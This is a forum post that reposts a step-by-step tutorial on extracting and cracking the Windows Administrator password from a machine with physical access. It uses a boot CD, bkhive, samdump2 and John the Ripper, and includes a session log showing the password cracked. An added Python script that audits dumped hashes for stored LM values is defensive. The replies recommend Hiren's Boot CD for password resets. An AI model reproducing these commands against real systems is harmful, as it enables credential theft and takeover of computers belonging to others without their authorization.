Ratna

Cracking Windows Administrator password


/* Tutorial By: IronGeek*/

 

 

 

Step 1. Download the Auditor Boot CD ISO and burn it to a CD-R. All of the tools we will be using in this tutorial come on the Auditor Boot CD.

 

Step 2. Insert the Auditor Boot CD into the target system, reboot and set the CD-ROM as the first boot device in the BIOS. Some systems let you hold down a certain function key at startup to choose what media to boot from (on recent Dells it’s F12).

 

Step 3. Auditor will begin to boot and ask you what screen resolution you want to use. Choose a resolution that your monitor and video card will support (I use 2 for 1024x768) then hit enter.

 

Step 4. When Auditor finishes booting click on the icon on the KDE bar for a new terminal window (it looks like a little monitor). Below you will see the commands you will have to use to get past SysKey, extract the hashes and attempt to crack the password hashes.

 

Step 5. Mount the local hard disk, most likely hda1:

Linux Command:

 

mount /dev/hda1

 

 

Step 6. Change the present working directory to the ramdisk so we have space to work with the files we will be creating:

Linux Command:

 

cd /ramdisk/

 

 

Step 7. Auditor comes with Ncuomo’s Samdump2 and Bkhive [6]. We will be using these tools to extract the system key from the System hive and the password hashes from the SAM file. To get the system key we need to use Bkhive on our SYSTEM file (most likely in C:\WINDOWS\system32\config\SYSTEM, that’s where it is on my XP Pro test box; on some systems it will be in C:\WINNT\system32\config\SYSTEM or perhaps on some other drive entirely). By the way, if for some reason you are running NT4 SP3 you will need to use Bkreg instead; all later systems (NT4 SP4, 2000 and XP) use Bkhive. To grab the system key and put it into a file we use the following command:

Linux Command:

 

bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt

 

 

Step 8. Now that we have the system key we can use it to undo SysKey on the SAM, extract the hashes and place them into a PWDump format file:

Linux Command:

 

samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes.txt

 

 

Step 9. At this point we have a PWDump format file called password-hashes.txt that we could copy off of the system and import into L0phtcrack [7] or Cain [8] (see the old tutorial for details). Since I said we were going to do it all with the Auditor CD and Open Source tools we will use John the Ripper to crack the hashes, but before we can use John we have to extract one of the many wordlists that come with Auditor. Take a look on the CD in /opt/auditor/full/share/wordlists/ for all of the different wordlists you can use; I’ll use english.txt for this tutorial. To extract english.txt to the ramdisk use the following command:

Linux Command:

 

gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt

 

 

Step 10. Now that everything is in place we can run John with a simple dictionary attack to see if we can crack any of the hashes:

Linux Command:

 

john password-hashes.txt -w:eng.txt

 

 

John detects that the dump file has LM (LAN Manager) hashes in it and chooses the format “NT LM DES [32/32 BS]” automatically. If I had disabled the storing of LM hashes in the SAM I might want to use the -f option to specify the NT hash format and try to crack the NT hashes instead. To do that I would use the following command:

Linux Command:

 

john password-hashes.txt -f:NT -w:eng.txt

 

 

If dictionary attacks aren’t working and you have a lot of time (as well as a fast computer) you can try John’s incremental (brute force) mode and see if it gives you better results:

Linux Command:

 

john password-hashes.txt -i:all

 

 

Incremental mode is limited to only eight characters unless you change the source before you compile it, but at more than eight characters you will likely be waiting a very long time for John to finish. Doing more than eight characters is pointless anyway if you have the LM hashes since they are stored as two seven byte parts (NT hashes are a different story and can be harder to crack).

 

In case you were wondering what all of these commands would look like along with their output here is a copy of my session log that may help you understand how they all work together (notice that the password for the Administrator account is “monkey”):

Session Log saved from Auditor CD:

 

root@1[~]# mount /dev/hda1

root@1[~]# cd /ramdisk/

root@1[ramdisk]# bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt

Bkhive ncuomo@studenti.unina.it

 

Bootkey: 407af4376e55f1fd6d58cc47a4fa4c01

root@1[ramdisk]# samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes.txt

Samdump2 ncuomo@studenti.unina.it

This product includes cryptographic software written

by Eric Young (eay@cryptsoft.com)

 

No password for user Guest(501)

No V value!

root@1[ramdisk]# gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt

root@1[ramdisk]# john password-hashes.txt -w:eng.txt

Loaded 3 password hashes with no different salts (NT LM DES [32/32 BS])

MONKEY (Administrator)

guesses: 1 time: 0:00:00:03 100% c/s: 1622943 trying: ZZYZX - ZZZZZZZ

root@1[ramdisk]# john password-hashes.txt -f:NT -w:eng.txt

Loaded 2 password hashes with no different salts (NT MD4 [TridgeMD4])

monkey (Administrator)

guesses: 1 time: 0:00:00:12 100% c/s: 464435 trying: zzzzzzzzzzzzzzzzzzzzzz

root@1[ramdisk]#
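
The session above falls to the LM format first because the SAM still held LM hashes, stored as two seven byte parts. As an added example (not part of the original post or of the Auditor tools), this Python script audits a PWDump format file such as password-hashes.txt and reports which accounts still have an LM hash stored. The sample lines and hash values are constructed, and the finding labels are this example's own.

```python
import re

EMPTY_LM_HALF = "aad3b435b51404ee"             # LM half for an empty 7-byte chunk
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed PWDump-format sample (user:rid:LM:NT:::); hash values are made up.
SAMPLE = """\
Administrator:500:1122334455667788aad3b435b51404ee:00112233445566778899aabbccddeeff:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
helpdesk:1003:8899aabbccddeeff0011223344556677:ffeeddccbbaa99887766554433221100:::
svc_backup:1004:aad3b435b51404eeaad3b435b51404ee:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
"""


def classify(lm, nt):
    """Return this example's own label for one LM/NT field pair."""
    lm, nt = lm.lower(), nt.lower()
    has_lm = bool(HEX32.match(lm)) and lm != EMPTY_LM_HALF * 2
    if not has_lm and not HEX32.match(nt):
        return "no-hash"                # e.g. the "NO PASSWORD***" placeholder
    if nt == EMPTY_NT:
        return "blank-password"
    if has_lm and lm[16:] == EMPTY_LM_HALF:
        return "lm-stored-7-or-fewer"   # second seven byte part is empty
    if has_lm:
        return "lm-stored-8-to-14"      # both seven byte parts are in use
    return "nt-only"                    # no LM hash kept for this account


def audit(text):
    """Return (user, rid, finding) for every well-formed PWDump line."""
    results = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 4 or not fields[1].isdigit():
            continue                    # skip tool banners and malformed lines
        user, rid, lm, nt = fields[:4]
        results.append((user, int(rid), classify(lm, nt)))
    return results


if __name__ == "__main__":
    for user, rid, finding in audit(SAMPLE):
        print(f"{user:15} rid={rid:<5} {finding}")
```

Accounts reported as lm-stored are the ones to fix first: stop Windows from storing LM hashes and have those passwords changed so the old LM value is dropped.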

 


nice 1 .. but its a very long method ... I have a small bootable CD ... just to make the administrator password disappear ???

 

much easier ;)


nice 1 .. but its a very long method ... I have a small bootable CD ... just to make the administrator password disappear ???

 

much easier ;)

 

Can you tell me this process in some details?

I will be thankful for this.

Thanks


nice 1 .. but its a very long method ... I have a small bootable CD ... just to make the administrator password disappear ???

 

much easier ;)

 

Can you tell me this process in some details?

I will be thankful for this.

Thanks

 

here

http://chautari.wnso.org/forums/index.php?showtopic=9816

 

Hiren's Boot CD.. it has all the tools you need. Plus it has a password resetting tool as well.

 

Very useful .
